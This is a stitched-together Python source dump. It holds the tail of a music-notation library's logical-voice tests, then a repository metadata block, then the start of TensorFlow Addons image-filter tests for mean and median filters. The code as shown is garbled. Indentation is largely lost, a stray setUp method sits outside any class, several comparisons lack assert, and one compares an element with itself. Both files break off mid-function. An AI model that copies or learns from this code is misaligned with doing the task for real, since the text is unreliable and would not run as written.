r'''A named staff and its contained unvoiced leaves share
the same signature.
'''
staff = Staff("c'8 d'8 e'8 f'8")
staff.name = 'foo'
containment = inspect_(staff).get_parentage().logical_voice
    for component in iterate(staff).by_class():
assert inspect_(component).get_parentage().logical_voice == containment
def test_selectiontools_Parentage_logical_voice_03():
r'''Leaves inside equally named sequential voices inside a staff
share the same signature.
'''
staff = Staff(Voice("c'8 d'8 e'8 f'8") * 2)
staff[0].name = 'foo'
staff[1].name = 'foo'
containment = inspect_(staff[0][0]).get_parentage().logical_voice
for leaf in staff.select_leaves():
assert inspect_(leaf).get_parentage().logical_voice == containment
def test_selectiontools_Parentage_logical_voice_04():
r'''Returns logical voice giving the root and
first voice, staff and score in the parentage of component.
'''
voice = Voice(
r'''
c'8
d'8
<<
\new Voice {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
'''
)
override(voice).note_head.color = 'red'
assert systemtools.TestManager.compare(
voice,
r'''
\new Voice \with {
\override NoteHead #'color = #red
} {
c'8
d'8
<<
\new Voice {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in voice.select_leaves(allow_discontiguous_leaves=True)]
assert signatures[0] == signatures[1]
assert signatures[0] != signatures[2]
assert signatures[0] != signatures[4]
assert signatures[0] == signatures[6]
assert signatures[2] == signatures[3]
assert signatures[2] != signatures[4]
def test_selectiontools_Parentage_logical_voice_05():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
voice = Voice(
r'''
c'8
d'8
<<
\context Voice = "foo" {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
'''
)
override(voice).note_head.color = 'red'
voice.name = 'foo'
assert systemtools.TestManager.compare(
voice,
r'''
\context Voice = "foo" \with {
\override NoteHead #'color = #red
} {
c'8
d'8
<<
\context Voice = "foo" {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in voice.select_leaves(allow_discontiguous_leaves=True)]
signatures[0] == signatures[1]
signatures[0] == signatures[2]
signatures[0] != signatures[4]
signatures[0] == signatures[6]
signatures[2] == signatures[0]
signatures[2] == signatures[3]
signatures[2] == signatures[4]
signatures[2] == signatures[6]
signatures[4] != signatures[0]
signatures[4] != signatures[2]
signatures[4] == signatures[5]
signatures[4] == signatures[6]
def test_selectiontools_Parentage_logical_voice_06():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
container = Container([
Staff([Voice("c'8 d'8")]),
Staff([Voice("e'8 f'8")]),
])
container[0].name = 'staff1'
container[1].name = 'staff2'
container[0][0].name = 'voicefoo'
container[1][0].name = 'voicefoo'
beam = Beam()
statement = 'attach(beam, container.select_leaves())'
assert pytest.raises(AssertionError, statement)
leaves = container.select_leaves(allow_discontiguous_leaves=True)
beam = Beam()
attach(beam, leaves[:2])
beam = Beam()
attach(beam, leaves[2:])
assert systemtools.TestManager.compare(
container,
r'''
{
\context Staff = "staff1" {
\context Voice = "voicefoo" {
c'8 [
d'8 ]
}
}
\context Staff = "staff2" {
\context Voice = "voicefoo" {
e'8 [
f'8 ]
}
}
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in leaves]
signatures[0] == signatures[1]
signatures[0] != signatures[2]
signatures[2] != signatures[2]
signatures[2] == signatures[3]
def test_selectiontools_Parentage_logical_voice_07():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
container = Container(
r'''
c'8
<<
\context Voice = "alto" {
d'8
}
\context Voice = "soprano" {
e'8
}
>>
{
\context Voice = "alto" {
f'8
}
\context Voice = "soprano" {
g'8
}
}
a'8
'''
)
override(container[1][1]).note_head.color = 'red'
override(container[2][1]).note_head.color = 'red'
assert systemtools.TestManager.compare(
container,
r'''
{
c'8
<<
\context Voice = "alto" {
d'8
}
\context Voice = "soprano" \with {
\override NoteHead #'color = #red
} {
e'8
}
>>
{
\context Voice = "alto" {
f'8
}
\context Voice = "soprano" \with {
\override NoteHead #'color = #red
} {
g'8
}
}
a'8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in container.select_leaves(allow_discontiguous_leaves=True)]
signatures[0] != signatures[1]
signatures[0] != signatures[2]
signatures[0] != signatures[3]
signatures[0] != signatures[4]
signatures[0] == signatures[5]
signatures[1] != signatures[0]
signatures[1] != signatures[2]
signatures[1] == signatures[3]
signatures[1] != signatures[4]
signatures[1] != signatures[5]
signatures[2] != signatures[0]
signatures[2] != signatures[1]
signatures[2] != signatures[3]
signatures[2] == signatures[4]
signatures[2] != signatures[5]
def test_selectiontools_Parentage_logical_voice_08():
    r'''Unincorporated leaves carry equivalent containment signatures.
'''
note_1 = Note(0, (1, 8))
note_2 = Note(0, (1, 8))
signature_1 = inspect_(note_1).get_parentage().logical_voice
signature_2 = inspect_(note_2).get_parentage().logical_voice
assert signature_1 == signature_2
def test_selectiontools_Parentage_logical_voice_
|
tensorflow/addons
|
tensorflow_addons/image/tests/filters_test.py
|
Python
|
apache-2.0
| 11,712
| 0.000256
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import pytest
import numpy as np
import tensorflow as tf
from tensorflow_addons.image import mean_filter2d
from tensorflow_addons.image import median_filter2d
from tensorflow_addons.image import gaussian_filter2d
from tensorflow_addons.utils import test_utils
from scipy.ndimage.filters import gaussian_filter
_dtypes_to_test = {
tf.dtypes.uint8,
tf.dtypes.int32,
tf.dtypes.float16,
tf.dtypes.float32,
tf.dtypes.float64,
}
_image_shapes_to_test = [
(3, 3, 1),
(3, 3, 3),
(1, 3, 3, 1),
(1, 3, 3, 3),
(2, 3, 3, 1),
(2, 3, 3, 3),
]
def tile_image(plane, image_shape):
"""Tile a 2-D image `plane` into 3-D or 4-D as per `image_shape`."""
assert 3 <= len(image_shape) <= 4
plane = tf.convert_to_tensor(plane)
plane = tf.expand_dims(plane, -1)
channels = image_shape[-1]
image = tf.tile(plane, (1, 1, channels))
if len(image_shape) == 4:
batch_size = image_shape[0]
image = tf.expand_dims(image, 0)
image = tf.tile(image, (batch_size, 1, 1, 1))
return image
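# For instance (illustrative): with image_shape=(2, 3, 3, 1), a 3x3 plane first
# gains a channel axis -> (3, 3, 1), then a batch axis tiled twice, giving a
# (2, 3, 3, 1) tensor whose two batch entries are identical copies of the plane.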
def setup_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, dtype
):
assert 3 <= len(image_shape) <= 4
height, width = image_shape[-3], image_shape[-2]
plane = tf.constant(
[x for x in range(1, height * width + 1)], shape=(height, width), dtype=dtype
)
image = tile_image(plane, image_shape=image_shape)
result = filter2d_fn(
image,
filter_shape=filter_shape,
padding=padding,
constant_values=constant_values,
)
return result
def verify_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, expected_plane
):
expected_output = tile_image(expected_plane, image_shape)
for dtype in _dtypes_to_test:
result = setup_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, dtype
)
np.testing.assert_allclose(
result.numpy(),
tf.dtypes.cast(expected_output, dtype).numpy(),
rtol=1e-02,
atol=1e-02,
)
def setUp(self):
self._filter2d_fn = mean_filter2d
super().setUp()
@pytest.mark.parametrize("image_shape", [(1,), (16, 28, 28, 1, 1)])
def test_invalid_image_mean(image_shape):
with pytest.raises((ValueError, tf.errors.InvalidArgumentError)):
image = tf.ones(shape=image_shape)
mean_filter2d(image)
@pytest.mark.parametrize("filter_shape", [(3, 3, 3), (3, None, 3)])
def test_invalid_filter_shape_mean(filter_shape):
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
mean_filter2d(image, filter_shape=filter_shape)
filter_shape = None
with pytest.raises(TypeError):
mean_filter2d(image, filter_shape=filter_shape)
def test_invalid_padding_mean():
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
mean_filter2d(image, padding="TEST")
def test_none_channels_mean():
# 3-D image
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(3, 3, None))
)
fn(tf.ones(shape=(3, 3, 1)))
fn(tf.ones(shape=(3, 3, 3)))
# 4-D image
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(1, 3, 3, None))
)
fn(tf.ones(shape=(1, 3, 3, 1)))
fn(tf.ones(shape=(1, 3, 3, 3)))
@pytest.mark.parametrize("shape", [(3, 3), (3, 3, 3), (1, 3, 3, 3)])
def test_unknown_shape_mean(shape):
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(shape=None, dtype=tf.dtypes.float32),
padding="CONSTANT",
constant_values=1.0,
)
image = tf.ones(shape=shape)
np.testing.assert_equal(image.numpy(), fn(image).numpy())
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[3.6666667, 4.0, 4.3333335],
[4.6666665, 5.0, 5.3333335],
[5.6666665, 6.0, 6.3333335],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_4x4_filter_mean(image_shape):
expected_plane = tf.constant(
[
[5.0, 5.0, 5.0],
[5.0, 5.0, 5.0],
[5.0, 5.0, 5.0],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(4, 4),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_constant_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[1.3333334, 2.3333333, 1.7777778],
[3.0, 5.0, 3.6666667],
[2.6666667, 4.3333335, 3.1111112],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=0,
expected_plane=expected_plane,
)
expected_plane = tf.constant(
[
[1.8888888, 2.6666667, 2.3333333],
[3.3333333, 5.0, 4.0],
[3.2222223, 4.6666665, 3.6666667],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=1,
expected_plane=expected_plane,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_symmetric_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[2.3333333, 3.0, 3.6666667],
[4.3333335, 5.0, 5.6666665],
[6.3333335, 7.0, 7.6666665],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="SYMMETRIC",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", [(1,), (16, 28, 28, 1, 1)])
def test_invalid_image_median(image_shape):
with pytest.raises((ValueError, tf.errors.InvalidArgumentError)):
image = tf.ones(shape=image_shape)
median_filter2d(image)
@pytest.mark.parametrize("filter_shape", [(3, 3, 3), (3, None, 3)])
def test_invalid_filter_shape_median(filter_shape):
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
median_filter2d(image, filter_shape=filter_shape)
filter_shape = None
with pytest.raises(TypeError):
        median_filter2d(image, filter_shape=filter_shape)
def test_invalid_padding_median():
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
median_filter2d(image, padding="TEST")
def test_none_channels_median():
# 3-D image
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(3, 3, None))
)
fn(tf.ones(shape=(3, 3, 1)))
fn(tf.ones(shape=(3, 3, 3)))
# 4-D image
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(1, 3, 3, None))
)
fn(tf.ones(shape=(1, 3, 3, 1)))
fn(tf.ones(
|